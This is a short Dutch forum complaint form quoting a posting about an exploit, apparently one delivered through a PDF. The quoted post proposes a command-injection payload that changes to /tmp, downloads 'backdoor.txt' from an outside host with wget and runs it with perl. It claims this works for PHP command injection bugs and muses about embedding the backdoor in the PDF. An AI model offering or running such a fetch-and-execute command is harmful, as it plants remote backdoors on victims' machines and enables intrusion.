Je hebt een klacht over de onderstaande posting:
Het blijkt dat de sudo command arguments/parameters niet goed werken met de exploit. Waarom zou je sudo willen/moeten uitvoeren? cd /tmp && wget http://www.somerogue.org/backdoor.txt && perl backdoor.txt Werkt prima voor al die php command injection bugs, waarom zou zoiets hier ook niet kunnen? En als ik het verhaal goed begrepen heb zou het zelfs mogelijk moeten zijn om die 'backdoor.txt' te embedden in de PDF zelf.
Beschrijf je klacht (Optioneel):